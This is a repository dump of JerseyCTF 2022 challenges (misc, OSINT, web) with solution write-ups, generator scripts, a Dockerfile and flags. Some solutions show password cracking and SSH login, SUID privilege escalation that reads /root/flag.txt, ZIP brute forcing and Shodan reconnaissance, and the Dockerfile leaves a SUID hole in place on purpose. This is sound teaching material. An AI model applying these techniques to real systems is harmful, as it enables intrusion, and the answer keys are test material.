12 | * Start by probing the /home directory to see which users have home folders. 13 | * Then, list all of the files in all of the home folders to notice that many files have a file called `file.txt` in them. 14 | * Search every one of those files using `grep` to see if it contains `jctf` as the flag. 15 | * Some users have a false-flag under their names, but it should be obvious which the true flag is as there is only one flag which is unique. 16 | * Example: User cenmu_vv has the flag, but their password is strong, 8czr702ziyj3ljktdx7a5_fdmwd9vlj. 17 | * John the Ripper found the password for user86, irina, in under a minute. `ssh user86@142.93.56.4`. 18 | * `for folder in /home/*; do ls -l $folder; done` to notice that many users have `file.txt`. 19 | * `for folder in /home/*; do grep 'jctf' $folder/file.txt; done` to find the actual flag. 20 | * Flag: `jctf{o_noes_dicTionarY_atk}` 21 | 22 | ## Credit 23 | * Developed by [SpadeAsInAce](https://github.com/spade-as-in-ace) 24 | -------------------------------------------------------------------------------- /misc/dnsmasq-ip-extract/README.md: -------------------------------------------------------------------------------- 1 | # dnsmasq-ip-extract 2 | 3 | ## Challenge Text 4 | * Extract all **unique** IPs from `dnsmasq-ip-extract-dnsmasq.log`, hash each IP (SHA256), and write the IP + hash to a text file (IP and hash should be separated by a space, and each IP + hash entry should be on a new line). 5 | 6 | **NOTE:** Alphabetical characters in the hash should be lower case, as seen in example below. Otherwise, your flag will be incorrect! 7 | 8 | * Example of text file output contents: 9 | ``` 10 | 10.59.78.165 a6dd519bf8c7c50df5ae519963b5cf1590a471f88343c603168645ff335b26fe 11 | 10.244.220.245 20657ea410e8dd2dbf979a12fea35dd1b94beb6c2cac34f1d49c5824d03de5a1 12 | 10.18.47.24 c0e481d8f55dbb7de078cdcf67ebf627dc371e969e7dbb0b93afcce104e9247e 13 | ``` 14 | 15 | * The flag is the SHA256 hash of the output file. 
Example: 16 | ``` 17 | jctf{138706baa74bac72c8ee1c42eb3a7c6add2f71c0737c5044dcdd9cba7409ead6} 18 | ``` 19 | 20 | ## Hint 21 | * Verify that the end of your file has a new blank line. 22 | 23 | ## Solution 24 | * Outline: 25 | * Open the log file. 26 | * For this sample dnsmasq log, the IP addresses are at the end of the log line. Extract each IP address using any method (regex, string slicing, etc.) and add it to a list. Don't add new IP addresses to the list if they already exist (deduplication). 27 | * Do not sort the list of IPs, they need to be in the order seen in the logs. 28 | * Loop through the list of unique IP addresses, and calculate the SHA256 hash of each string. 29 | * Create a string consisting of each IP address string and SHA256 hash of same, separated by a single space. 30 | * Output this string to a file, ensuring each string is on a new line. 31 | * Calculate the hash of the file contents once all IP address/hash string have been written to the file. Note that the way the challenge was written, the answer file contains a new line character at the end, which will influence the file hash (and ultimately the flag). I've noted this in the hint. 32 | * The hash of the entire output file is the flag. 33 | 34 | * I have written two solution scripts (PowerShell and Python) which demonstrate the outline above, see these files for details: 35 | * [dnsmasq-ip-extract-solution.ps1](../dnsmasq-ip-extract/sol/solution_scripts/dnsmasq-ip-extract-solution.ps1) 36 | * [dnsmasq-ip-extract-solution.py](../dnsmasq-ip-extract/sol/solution_scripts/dnsmasq-ip-extract-solution.py) 37 | 38 | * Flag: `jctf{90dc97926e09a45aa02ca3a95db387bb00ff83ccff18f4d18a3eb96b4893e8bb}` 39 | 40 | ## Additional Files 41 | * [dnsmasq-ip-extract-challenge-generator.py](../dnsmasq-ip-extract/sol/dnsmasq-ip-extract-challenge-generator.py) 42 | * Script to generate a brand new challenge! 
Outputs the following: 43 | * A new sample log file (dnsmasq-ip-extract-dnsmasq.log); 44 | * A new answer file (dnsmasq-ip-extract-answer-list.txt); 45 | * A file containing the new challenge flag (dnsmasq-ip-extract-flag.txt). 46 | * [dnsmasq-ip-extract-answer-list.txt](../dnsmasq-ip-extract/sol/dnsmasq-ip-extract-answer-list.txt) 47 | * This is the output a participant's script should generate if completed properly. 48 | * [dnsmasq-ip-extract-flag.txt](../dnsmasq-ip-extract/sol/dnsmasq-ip-extract-flag.txt) 49 | * Contains the challenge flag. 50 | 51 | ## Credit 52 | * Developed by Kevin McKenzie 53 | -------------------------------------------------------------------------------- /misc/dnsmasq-ip-extract/sol/dnsmasq-ip-extract-challenge-generator.py: -------------------------------------------------------------------------------- 1 | from datetime import datetime as dt 2 | from datetime import timedelta 3 | import hashlib 4 | import ipaddress 5 | import random 6 | 7 | #Set number of IPs should be in the answer sheet. 8 | #Larger list will discourage the use of manual tools to accomplish the task. 9 | num_answers = 5000 10 | 11 | #Create files containing dnsmasq log, answer output and flag. 12 | question_file = open("dnsmasq-ip-extract-dnsmasq.log", "w+") 13 | answer_list = open("dnsmasq-ip-extract-answer-list.txt", "w+") 14 | flag_out = open("dnsmasq-ip-extract-flag.txt", "w+") 15 | 16 | #Get all IPs in the 10 private range. 17 | print("Getting private IPs in 10.0.0.0/8 range...") 18 | priv_addresses = [str(ip) for ip in ipaddress.IPv4Network('10.0.0.0/8').hosts()] 19 | 20 | #Generate a random list of IP addresses in the private range. 21 | print(f"Getting {num_answers} random IPs...") 22 | random_ips = (random.sample(priv_addresses, num_answers)) 23 | 24 | #Internal string containing answer list, used to calculate hash later. 25 | answer_list_internal = "" 26 | 27 | #Generate answer list. 
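#Gets each random IP (in order), hashes the string and
#outputs a line containing each IP and hash, separated by a space.
print("Generating answer list...")
for ip in random_ips:
    ip_hash = hashlib.sha256(ip.encode()).hexdigest()
    entry = f"{ip} {ip_hash}\n"
    answer_list.write(entry)
    #Keep an in-memory copy of every line written; the flag is computed
    #from this string once the answer list is complete.
    answer_list_internal += entry

#Start the fake log five days before the time the generator is run.
seed_time = dt.now() - timedelta(days=5)

#Strings to generate fake dnsmasq logs.
dnsmasq_string = "dnsmasq[28478]:"
query_string = "query[A] dns.google.com from"
forward_string = "forwarded dns.google.com to"
cached_string = "cached dns.google.com is"
reply_string = "reply dns.google.com is"

#Generate dnsmasq logs using randomly selected IPs above.
#Every IP is written on three consecutive log lines, which is why a
#solver has to deduplicate while keeping the order of first appearance.
for ip in random_ips:
    #The order of the two random draws is kept so a seeded run is unchanged.
    log_type = random.randint(0, 1)
    step_time = random.uniform(3, 16)
    #Advance the clock by 3-16 seconds per IP so timestamps only increase.
    seed_time = seed_time + timedelta(seconds=step_time)
    log_time = seed_time.strftime("%b %d %H:%M:%S")

    if log_type == 0:
        #Log entries for forwarded DNS requests (query, forwarded, reply).
        question_file.write(f"{log_time} {dnsmasq_string} {query_string} {ip}\n")
        question_file.write(f"{log_time} {dnsmasq_string} {forward_string} {ip}\n")
        question_file.write(f"{log_time} {dnsmasq_string} {reply_string} {ip}\n")
    else:
        #Log entries for cached DNS records (query, cached, reply).
        question_file.write(f"{log_time} {dnsmasq_string} {query_string} {ip}\n")
        question_file.write(f"{log_time} {dnsmasq_string} {cached_string} {ip}\n")
        question_file.write(f"{log_time} {dnsmasq_string} {reply_string} {ip}\n")

#Write flag to file.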
66 | flag_hash = (hashlib.sha256(answer_list_internal.encode())).hexdigest() 67 | flag_out.write(f"jctf{{{flag_hash}}}") 68 | -------------------------------------------------------------------------------- /misc/dnsmasq-ip-extract/sol/dnsmasq-ip-extract-flag.txt: -------------------------------------------------------------------------------- 1 | jctf{90dc97926e09a45aa02ca3a95db387bb00ff83ccff18f4d18a3eb96b4893e8bb} -------------------------------------------------------------------------------- /misc/dnsmasq-ip-extract/sol/solution_scripts/dnsmasq-ip-extract-solution.ps1: -------------------------------------------------------------------------------- 1 | #Open file for processing. 2 | $file_in = Get-Content -Path ".\dnsmasq-ip-extract-dnsmasq.log" 3 | 4 | #Output file for answer (will be hashed later for the flag). 5 | $file_out = ".\powershell_answer.txt" 6 | 7 | #Clear contents of output file if it exists. 8 | if (Test-Path $file_out) 9 | { 10 | Clear-Content($file_out) 11 | } 12 | 13 | #List to store discovered IP addresses. 14 | $ip_list = @() 15 | 16 | #Populate IP list, this will deduplicate addresses and maintain the 17 | #order presented in the logs (important for correct hash generation). 18 | foreach ($line in $file_in) 19 | { 20 | $ip = $line.split(" ")[-1] -replace "`n","" 21 | if ($ip_list -notcontains $ip) 22 | { 23 | $ip_list += $ip 24 | } 25 | } 26 | 27 | #Calculate hash for each IP and write to file. 28 | foreach($ip in $ip_list) 29 | { 30 | $ip_hash = Get-FileHash -InputStream ([System.IO.MemoryStream]::New([System.Text.Encoding]::ASCII.GetBytes($ip))) 31 | "$($ip) $($ip_hash.Hash.toLower())" | Out-File -Append -FilePath "powershell_answer.txt" 32 | } 33 | 34 | #Get hash of output file and create flag. 35 | #Participants can generate hash in a terminal or other program. 
36 | $output_hash = (Get-FileHash $file_out).Hash.toLower() 37 | Write-Output("jctf{$output_hash}") -------------------------------------------------------------------------------- /misc/dnsmasq-ip-extract/sol/solution_scripts/dnsmasq-ip-extract-solution.py: -------------------------------------------------------------------------------- 1 | #Library for calculating hashes in Python. 2 | #Participants could also import os and use their OS' native commands. 3 | import hashlib 4 | 5 | #Open log file for processing. 6 | file_in = open("dnsmasq-ip-extract-dnsmasq.log", "r") 7 | 8 | #List to store discovered IP addresses. 9 | ip_list = [] 10 | 11 | #String containing the answer output. 12 | answer = "" 13 | 14 | #Populate IP list, this will deduplicate addresses and maintain the 15 | #order presented in the logs (important for correct hash generation). 16 | for line in file_in: 17 | ip = ((line.split(" "))[-1]).strip("\n") 18 | if ip not in ip_list: 19 | ip_list.append(ip) 20 | 21 | for ip in ip_list: 22 | ip_hash = (hashlib.sha256(ip.encode())).hexdigest() 23 | answer += (f"{ip} {ip_hash}\n") 24 | 25 | #Get hash of answer from above and generate hash. 26 | #Participant are instructed to output the answer to a file for hashing. 27 | answer_hash = (hashlib.sha256(answer.encode())).hexdigest() 28 | print(f"jctf{{{answer_hash}}}") -------------------------------------------------------------------------------- /misc/filtered-feeders/README.md: -------------------------------------------------------------------------------- 1 | # filtered-feeders 2 | 3 | ## Challenge Text 4 | * The fishing net caught plenty of herrings, but the flag is nowhere to be found! Try to find the flag within the pile of fish. 5 | 6 | ## Hint 7 | * How do you hide an image within an image? 
8 | 9 | ## Solution 10 | * Use an image steganography decoder like this - https://incoherency.co.uk/image-steganography/ 11 | * Select **Unhide image**, upload the image, and use the slider to extract the lowest 2 bits for the hidden image. 12 | * Flag: `jctf{1_l0v3_h3rr1n65}` 13 | 14 | ## Credit 15 | * Developed by [Tensei](https://github.com/SemiCicada) 16 | -------------------------------------------------------------------------------- /misc/filtered-feeders/challenge/herrings.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/misc/filtered-feeders/challenge/herrings.png -------------------------------------------------------------------------------- /misc/firewall-rules/README.md: -------------------------------------------------------------------------------- 1 | # firewall-rules 2 | 3 | ## Challenge Text 4 | * Liar, Liar, Rules on Fire! A network administrator configured a device's firewall, but made a few errors along the way. Some of your favorite applications may have been denied... We can't worry about that yet, first step is to make sure external hosts aren't able to exploit vulnerable firewall rules. 5 | * Sum the vulnerable ports and put the answer in the flag format: jctf{INSERT NUMBER} 6 | 7 | ## Hint 8 | * Sometimes Google searches lead to numbers! 9 | * Focus on remote access.
10 | 11 | ## Solution 12 | * Pull up list of TCP and UDP port numbers: https://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers 13 | * Query through each firewall rule and note that the allowed insecure ports that provide remote access or unencrypted connection are: 513 (rlogin), 23 (telnet), 3389 (RDP) 14 | * 513 + 23 + 3389 = jctf{3925} 15 | 16 | ## Credit 17 | * Developed by [Logan](https://github.com/Git-Logan) 18 | -------------------------------------------------------------------------------- /misc/firewall-rules/challenge/firewall rules.xlsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/misc/firewall-rules/challenge/firewall rules.xlsx -------------------------------------------------------------------------------- /misc/root-me/README.md: -------------------------------------------------------------------------------- 1 | # root-me 2 | 3 | ## Challenge Text 4 | * SSH into the challenge host, 0.cloud.chals.io on port 19777 5 | * Username: ubuntu Password: jctf2022! 6 | * Find the flag 7 | 8 | ## Solution 9 | * Use the find command to find any files owned by root with the SUID bit set 10 | ``` 11 | find / -perm -4000 12 | ``` 13 | 14 | * Use the date command to leak the flag 15 | ``` 16 | date -f /root/flag.txt 17 | ``` 18 | * Flag: `jctf{4cc355_6r4n73d}` 19 | 20 | ## Credit 21 | * Developed by [Rob](https://github.com/njccicrob) 22 | -------------------------------------------------------------------------------- /misc/root-me/challenge/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:latest 2 | 3 | RUN apt update && apt install openssh-server sudo -y 4 | 5 | RUN apt install net-tools sudo -y 6 | 7 | RUN groupadd --gid 1000 ubuntu 8 | 9 | RUN useradd -rm -d /home/ubuntu -s /bin/bash -g ubuntu -u 1000 ubuntu 10 | 11 | RUN echo 'ubuntu:jctf2022!' 
|chpasswd 12 | 13 | RUN sed -i 's/#Port 22/Port 2222/' /etc/ssh/sshd_config 14 | 15 | RUN service ssh start 16 | 17 | EXPOSE 2222 18 | 19 | CMD ["/usr/sbin/sshd","-D"] 20 | 21 | COPY flag.txt /root 22 | 23 | RUN chmod 4755 /usr/bin/date 24 | 25 | RUN chmod a-w /tmp 26 | 27 | RUN chmod a-w /home/ubuntu 28 | 29 | RUN chown -R root:root /home/ubuntu 30 | -------------------------------------------------------------------------------- /misc/root-me/challenge/flag.txt: -------------------------------------------------------------------------------- 1 | jctf{4cc355_6r4n73d} 2 | -------------------------------------------------------------------------------- /misc/snort-log/README.md: -------------------------------------------------------------------------------- 1 | # snort-log 2 | 3 | ## Challenge Text 4 | * Let's just say: we are absolutely screwed. The company network administrator recently deployed Snort on our network and immediately received 575 alerts in the log file. To put it lightly, every attack out there is infecting the network. Did you take the required Information Security training? Anyways, the company is going to file for bankruptcy because of this :(. We might as well do SOMETHING so that we can get hired elsewhere. The network administrator mentions to you that after finishing reviewing the log file, she also noticed the web server CPU load and memory usage were abnormally high. Also, what's up with all of this network traffic? Manual analysis stinks, but let's find out what this attack is and take action... 5 | * Put your answer in the flag format: jctf{INSERT STRING} 6 | 7 | ## Hint 8 | * Seems like the extra network traffic is primarily inbound, not outbound. 9 | 10 | ## Solution 11 | * Note the attack symptoms and determine it is a DDoS botnet being alerted in Snort. 
(Botnet indicators - https://www.altexsoft.com/blog/botnet-detection/) 12 | * Search through the alerts for the keyword DDoS - "ET TROJAN Drive DDoS Tool byte command received key=aut0m@t1on1sb3tt3r" 13 | * Flag: `jctf{aut0m@t1on1sb3tt3r}` 14 | 15 | ## Credit 16 | * Log file was generated by https://github.com/SubtleScope/logfile-generators 17 | * Developed by [Logan](https://github.com/Git-Logan) 18 | -------------------------------------------------------------------------------- /misc/we-will/README.md: -------------------------------------------------------------------------------- 1 | # we-will 2 | 3 | ## Challenge Text 4 | * A flag was left behind but it seems to be protected. 5 | 6 | ## Hint 7 | * The challenge name should help you figure out how to open it. 8 | 9 | ## Solution 10 | * Brute force the password protected ZIP file 11 | * The password is: *@@!^^$25Jjersey 12 | 13 | ``` 14 | fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt flag.zip 15 | ``` 16 | 17 | ## Credit 18 | * Developed by [Rob](https://github.com/njccicrob) 19 | -------------------------------------------------------------------------------- /misc/we-will/challenge/flag.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/misc/we-will/challenge/flag.zip -------------------------------------------------------------------------------- /osint/README.md: -------------------------------------------------------------------------------- 1 | # OSINT 2 | 3 | ## Easy Challenges 4 | | Challenge Name | Description | Hint 5 | |:-- | :-- | :--- 6 | | [dns-joke](dns-joke) | There is a DNS joke hidden somewhere in www.jerseyctf.com. | How are IP addresses pointed towards domain names? 7 | | [photo-op-spot](photo-op-spot) |In three words tell me where I stood when I grabbed this picture. |GPS coordinates aren't the only method of specifying a location. 
Format for solution: jctf{yourthreewords} - no special characters. 8 | | [rarity](rarity) | With three belonging to a respective company, there are only a two-digit number amount of this entity left in the world. | Aren't sub sandwiches great? 9 | 10 | ## Medium Challenges 11 | | Challenge Name | Description | Hint 12 | |:-- | :-- | :--- 13 | | [sho-me-whats-wrong](sho-me-whats-wrong) | A company that provides affordable satellite communication services appears to have devices scattered across the Internet with a known vulnerability. | How do you filter through an Excel spreadsheet for the information you want? 14 | | [mystery](mystery) | Someone thought it would be fun to leave this mysterious clue. How do these two items lead to the flag? | This detective has an innovative search tool. 15 | | [contributor](contributor) | One of the speakers actually helped us develop https://www.jerseyctf.com/ and http://www.jerseyctf.online/. | 1.0 × 10^100 16 | -------------------------------------------------------------------------------- /osint/contributor/README.md: -------------------------------------------------------------------------------- 1 | # contributor 2 | 3 | ## Challenge Text 4 | * Aren’t tech talks great? The JerseyCTF organizing staff is so grateful that our speakers can share their wonderful experiences with our participants. In fact, one of the speakers actually helped us develop https://www.jerseyctf.com/ and http://www.jerseyctf.online/. How cool is that! 5 | 6 | ## Hint 7 | * 1.0 × 10^100 8 | 9 | ## Solution 10 | * In the https://www.jerseyctf.com/ source code, find the **DRodgers** comment, which matches the speaker Donnie Rodgers. 11 | * Using the **Forgot Password?** feature on http://www.jerseyctf.online, enter **DRodgers** to be shown 3 security questions.
12 | * Using Google, locate Donnie Rodgers' [LinkedIn](https://www.linkedin.com/in/donnie-rodgers) by searching `Donnie Rodgers PlainDilemma` with the 3 answers being **Bank Heist Security 101**, **Rahway**, and **Arm wrestling**. 13 | * Flag: `jctf{b3_CAR3fu1_wh@t_yOU_put_on_the_WEB}` 14 | * Shares website with web/heres-my-password challenge. 15 | 16 | * **Important:** Donnie Rodgers is a fictional person. His name and connections to academic institutions and companies are all made up. His face is AI generated and is not a real person. 17 | 18 | ## Credit 19 | * Developed by [Andrew](https://github.com/peppermintpatty5) and [Logan](https://github.com/Git-Logan) 20 | * AI generated face made by https://generated.photos/face-generator/new 21 | -------------------------------------------------------------------------------- /osint/contributor/other/forgot_password.php: -------------------------------------------------------------------------------- 1 | [ 6 | "q" => "What was your first job's company name?", 7 | "a" => "Bank Heist Security 101" 8 | ], 9 | "q2" => [ 10 | "q" => "What city was your high school located in?", 11 | "a" => "Rahway", 12 | ], 13 | "q3" => [ 14 | "q" => "What is your favorite sport?", 15 | "a" => "Arm wrestling" 16 | ] 17 | ]; 18 | 19 | function showFirstForm() 20 | { 21 | ?> 22 |
23 | 26 | 27 |
28 | 35 |

Security Questions

36 |
37 | $question) { ?> 39 | 42 |
43 | 44 | 45 |
46 | 52 | 55 | 60 | 63 | 64 | 65 | 66 | 67 | 68 | Forgot Password 69 | 70 | 71 | 72 |

Forgot Password

73 | 74 | $question) { 91 | if ($_POST[$question_id] !== $question["a"]) { 92 | $missed_question = $question; 93 | break; 94 | } 95 | } 96 | if ($missed_question === null) { 97 | showFirstForm(); 98 | scriptAlert(FLAG); 99 | } else { 100 | showSecondForm(); 101 | scriptAlert("Incorrect Answer(s)"); 102 | } 103 | } 104 | } else { 105 | showFirstForm(); 106 | } ?> 107 | 108 | 109 | 110 | -------------------------------------------------------------------------------- /osint/contributor/other/headshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/osint/contributor/other/headshot.png -------------------------------------------------------------------------------- /osint/contributor/other/index.php: -------------------------------------------------------------------------------- 1 | 6 | 7 | 8 | 9 | 10 | 11 | Login 12 | 13 | 14 | 15 |

Login

16 |
17 | 20 |
21 | 24 |
25 | 26 |
27 |
Forgot Password? 28 | 31 | 34 | 35 | 38 | 40 | 41 | 42 | 43 | -------------------------------------------------------------------------------- /osint/dns-joke/README.md: -------------------------------------------------------------------------------- 1 | # dns-joke 2 | 3 | ## Challenge Text 4 | * A system administrator hasn't smiled in days. Legend has it, there is a DNS joke hidden somewhere in www.jerseyctf.com. Can you help us find it to make our system administrator laugh? 5 | 6 | ## Hint 7 | * How are IP addresses pointed towards domain names? 8 | 9 | ## Solution 10 | * Use any of the following dig, nslookup, or host commands to search the DNS records of www.jerseyctf.com: 11 | * dig www.jerseyctf.com txt 12 | * dig -t txt www.jerseyctf.com +short 13 | * host -t txt www.jerseyctf.com 14 | * nslookup -type=txt www.jerseyctf.com 15 | * The flag will be in a string: `jctf{DNS_J0k3s_t@k3_24_hrs}` 16 | 17 | ## Credit 18 | * Developed by [Logan](https://github.com/Git-Logan) 19 | -------------------------------------------------------------------------------- /osint/mystery/README.md: -------------------------------------------------------------------------------- 1 | # mystery 2 | 3 | ## Challenge Text 4 | * Someone thought it would be fun to leave this mysterious clue. How do these two items lead to the flag? 5 | 6 | ## Hint 7 | * This detective has an innovative search tool. 8 | 9 | ## Solution 10 | * Realize that the image of Benedict Cumberbatch is pointing towards Sherlock. The Sherlock tool can be used with a username to identify their online and social media accounts. By running it, identify several social media accounts including Twitter. Search of recent njcybersecurity Tweets shows a comment on March 2nd with the flag. 
11 | * Flag: `jctf{Myst3ry-S0lv3d!}` 12 | 13 | ## Credit 14 | * Developed by [Mandy](https://github.com/mrsgcyber) 15 | -------------------------------------------------------------------------------- /osint/mystery/challenge/mystery.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/osint/mystery/challenge/mystery.JPG -------------------------------------------------------------------------------- /osint/photo-op-spot/README.md: -------------------------------------------------------------------------------- 1 | # photo-op-spot 2 | 3 | ## Challenge Text 4 | * In three words tell me where I stood when I grabbed this picture. 5 | 6 | ## Hint 7 | * GPS coordinates aren't the only method of specifying a location. 8 | * Solution format: jctf{yourthreewords} - no special characters 9 | 10 | ## Solution 11 | * Google Reverse image search to find the Transforest statue in Seattle. 12 | * Use Google Maps Street View to find the same view of the statue. 
Identify the Latitude and Longitude of that location= 47.618915234129, -122.33298024678056 13 | * Use that GPS data at https://what3words.com 14 | * Flag: `jctf{unionslakespine}` 15 | 16 | ## Credit 17 | * Developed by [Mandy](https://github.com/mrsgcyber) -------------------------------------------------------------------------------- /osint/photo-op-spot/challenge/photo-op-spot.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/osint/photo-op-spot/challenge/photo-op-spot.JPG -------------------------------------------------------------------------------- /osint/rarity/README.md: -------------------------------------------------------------------------------- 1 | # rarity 2 | 3 | ## Challenge Text 4 | * With three belonging to a respective company, there is only a two-digit number amount of this entity left in the world. There is one near this picture... how close can you get to it? 5 | * The flag format is the coordinates in decimal degrees notation, for example: `jctf{-65.91374,-10.81140}` 6 | * Get the coordinates **at the gate** 7 | 8 | ## Hint 9 | * Aren't sub sandwiches great? 10 | * https://en.wikipedia.org/wiki/Hindenburg_disaster 11 | 12 | ## Solution 13 | * Note the **330** area code in the bottom right corner of the picture which is in the Akron, Ohio area. 14 | * Based on the hint of sub sandwiches, this could point towards Blimpie Sub Sandwiches, and Blimp can be taken from this which is the entity being discussed. Alternatively, research on the provided rarity numbers + Akron can lead to this conclusion as well. 15 | * Goodyear Tires owns 3 blimps in the United States, and the 1 in Ohio is located by Wingfoot Lake. Open Google Maps and drag/drop Pegman (the person icon) to the spot closest to The Hangar. 16 | * Click to go up to the gates and note the coordinates in the URL. 
17 | * Flag: `jctf{41.019753,-81.3621151}` 18 | 19 | ## Credit 20 | * Developed by [Logan](https://github.com/Git-Logan) 21 | -------------------------------------------------------------------------------- /osint/rarity/challenge/picture.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/osint/rarity/challenge/picture.png -------------------------------------------------------------------------------- /osint/sho-me-whats-wrong/README.md: -------------------------------------------------------------------------------- 1 | # sho-me-whats-wrong 2 | 3 | ## Challenge Text 4 | * A company that provides affordable satellite communication services appears to have devices scattered across the Internet with a known vulnerability. SNMP seems to be in-use with these devices, although the vulnerability is with another service. [Shodan](https://shodan.io) is a search engine that allows users to passively search for devices connected to the Internet worldwide. Find the vulnerability and use the flag format jctf{ENTER CVE HERE}. 5 | 6 | * IMPORTANT: Shodan’s search results are real-life hosts. This flag needs to be found using completely legal, passive reconnaissance methods to gather OSINT on Shodan. Do not use any illegal or active reconnaissance methods for this challenge. 7 | There are a limited number of searches whether you have an account or not, so make each one count! Signing up for a free account or with a .edu email provides you additional searches. 8 | 9 | ## Hint 10 | * How do you filter through an Excel spreadsheet for the information you want? 
11 | * Very-small-aperture terminal 12 | 13 | ## Solution 14 | * Pick key words from the challenge text to filter, specifically `satellite` and `SNMP` 15 | * Research [Shodan search filters](https://www.shodan.io/search/filters), different Shodan key words for a satellite: `vsat`, and the SNMP UDP port: `161` 16 | * In Shodan, search `"vsat" port:161` 17 | * Click one of the returned hosts, and note the vulnerability CVE for the flag. 18 | * Flag: `jctf{CVE-2018-19052}` 19 | 20 | ## Credit 21 | * Developed by [Logan](https://github.com/Git-Logan) 22 | -------------------------------------------------------------------------------- /sponker/README.md: -------------------------------------------------------------------------------- 1 | # speakers + sponsors 2 | 3 | ## Speaker Challenges 4 | | Speaker Name | Description | Flag 5 | |:-- | :-- | :--- 6 | | brian | Heisters can attend tech talks to refine their bank (cyber)security skills. | jctf{0fJlvhqcXy} 7 | | jon | Heisters can attend tech talks to refine their bank (cyber)security skills. | jctf{couch_light_pencil} 8 | | kevin | Heisters can attend tech talks to refine their bank (cyber)security skills. | jctf{icCDdOlDW0} 9 | | max | Heisters can attend tech talks to refine their bank (cyber)security skills. | jctf{idea_television_sleep} 10 | | debbi | Heisters can attend tech talks to refine their bank (cyber)security skills. | jctf{word_testing_shirt} 11 | | pinky/eric | Heisters can attend tech talks to refine their bank (cyber)security skills. | jctf{plane_bowl_mouse} 12 | | pat/jermaine/joe | Heisters can attend tech talks to refine their bank (cyber)security skills. 
| jctf{78POYdCGzf} 13 | 14 | ## Sponsor Challenges 15 | | Sponsor Name | Description | Flag 16 | |:-- | :-- | :--- 17 | | njccic | **Connect with NJCCIC:** *Website*: https://cyber.nj.gov | jctf{pr0t3ct_NJ_cyb3r_sp@C3} 18 | | frsecure | **Connect with FRSecure:** *Website*: https://frsecure.com/ | jctf{inf0rmation_SECURITY_#1} 19 | | google | **Connect with Google:** *Website:* https://cloud.google.com/ | jctf{z3r0_trust_infr@structure} 20 | | palo alto networks | **Connect with Palo Alto Networks:** *Website:* https://www.paloaltonetworks.com/ | jctf{gl0b@l_cyb3rSECurity_l3@der} 21 | | crowdstrike | **Connect with CrowdStrike:** *Website:* https://www.crowdstrike.com/ | jctf{br3aches_stop_HERE!} 22 | 23 | ## Feedback Challenge 24 | | Description | Flag 25 | |:-- | :-- 26 | | On Sunday, the JerseyCTF Feedback Google Form will be released on the Discord #announcements text channel. Fill out this feedback form for a flag in the confirmation message! | jctf{tH@nks_for_aTTending_PART2!} 27 | 28 | 29 | -------------------------------------------------------------------------------- /web/README.md: -------------------------------------------------------------------------------- 1 | # Web 2 | 3 | ## Easy Challenges 4 | | Challenge Name | Description | Hint 5 | |:-- | :-- | :--- 6 | | [apache-logs](apache-logs) | There is suspicion that an external host was able to access a sensitive file accidentally placed in one of the company website's directories. | Which directory types should sensitive files not be placed in? 7 | | [seigwards-secrets](seigwards-secrets) | Seigward has been storing his secrets on his website for decades. Hasn't failed him yet. | Where can you find a website's code? 8 | 9 | ## Medium Challenges 10 | | Challenge Name | Description | Hint 11 | |:-- | :-- | :--- 12 | | [buster](buster) | Check out my new site, it has lots of cool pages! | What do HTTP response codes actually mean? 
13 | | [heres-my-password](heres-my-password) | We have a list of 500 users (males, females, and pets) and one password. Log-in with the proper credentials for the flag. | This is not intended to require manual brute force. What are some other types of brute force methods? 14 | | [road-not-taken](road-not-taken) | You've reached a fork in the road! Choose the right path to find your way to the flag. Start here: https://jerseyctf-road-not-taken.chals.io/ | Recent CVEs may help you find your way. 15 | |[flag-vault](flag-vault)|I'm very organized. I even keep all of my flags neatly organized in a database! But, these are my flags! You don't have access to them... or do you? Start here: jerseyctf-flag-vault.chals.io | What is the most common type of database? 16 | 17 | 18 | ## Hard Challenges 19 | | Challenge Name | Description | Hint 20 | |:-- | :-- | :--- 21 | | [cookie-factory](cookie-factory) | Here at Granny's Old-Fashioned Home-Baked Cookie Factory, we pride ourselves on our cookies AND security being the best in the business. Start here: https://jerseyctf-cookie-factory.chals.io/ | No hints. 22 | -------------------------------------------------------------------------------- /web/apache-logs/README.md: -------------------------------------------------------------------------------- 1 | # apache-logs 2 | 3 | ## Challenge Text 4 | * An apache log file that contains recent traffic was pulled from a web server. There is suspicion that an external host was able to access a sensitive file accidentally placed in one of the company website's directories. Someone's getting fired... 5 | * Identify the source IP address that was able to access the file by using the flag format: jctf{IP address} 6 | 7 | ## Hint 8 | * Which directory types should sensitive files not be placed in? 9 | 10 | ## Solution 11 | * Query through the web traffic for a connection by searching for a HTTP 200 OK success status response code. All 404's can be ignored. 
12 | * Identify the accessed sensitive file that was accidentally placed in the website's temporary (tmp) folder - "https://www.davisbank.com/tmp/bankrecords.pdf" 13 | * Identify the source IP address of the connection - jctf{76.190.52.148} 14 | 15 | ## Credit 16 | * Log file was generated by https://github.com/kiritbasu/Fake-Apache-Log-Generator 17 | * Developed by [Logan](https://github.com/Git-Logan) 18 | -------------------------------------------------------------------------------- /web/buster/README.md: -------------------------------------------------------------------------------- 1 | # buster 2 | 3 | NOTE: The provided Python file, `buster.py`, should be run on a server and not be given as part of the challenge; just the URL of the server should be given. 4 | 5 | ## Challenge Text 6 | * Check out my new site, it has lots of cool pages! https://jerseyctf.xyz 7 | 8 | ## Hint 9 | * What do HTTP response codes actually mean? 10 | * The intended solution is a directory brute force. 11 | 12 | ## Solution 13 | 14 | Directory enumeration challenge where every request returns a random HTTP status 15 | 16 | The root webpage has a comment 